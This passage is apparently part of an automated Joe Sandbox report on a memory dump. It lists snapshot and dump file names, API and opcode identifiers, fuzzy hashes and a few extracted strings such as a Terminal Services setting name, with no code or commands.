                                                                                                                                                                                                                                • Associated: 00000023.00000002.4845502772.000000001F2BD000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_35_2_1f190000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: 0$Flst
                                                                                                                                                                                                                                • API String ID: 0-758220159
                                                                                                                                                                                                                                • Opcode ID: 7671b746e9a3d7cabad5162f6d8287a4dd44e40ca0ff09c8353110bb32f0bd2a
                                                                                                                                                                                                                                • Instruction ID: fcd3f4336cb28448ed19d9291d599313c38f22fb2ce35328332dbc431d6ffc0c
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7671b746e9a3d7cabad5162f6d8287a4dd44e40ca0ff09c8353110bb32f0bd2a
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7451A9B1E0028A8FDB24CF95C584799FBF4EF44715F25C12AD0499F240E7B0AA99CB80
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                • kLsE, xrefs: 1F1C05FE
                                                                                                                                                                                                                                • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 1F1C0586
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000023.00000002.4843522033.000000001F190000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F190000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000023.00000002.4845349706.000000001F2B9000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000023.00000002.4845502772.000000001F2BD000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_35_2_1f190000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                                                                                                • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                                                                                                                                                                                                • API String ID: 3446177414-2547482624
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000023.00000002.4843522033.000000001F190000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F190000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000023.00000002.4845349706.000000001F2B9000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000023.00000002.4845502772.000000001F2BD000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_35_2_1f190000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                                                                                                • String ID: 0$0
                                                                                                                                                                                                                                • API String ID: 3446177414-203156872
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%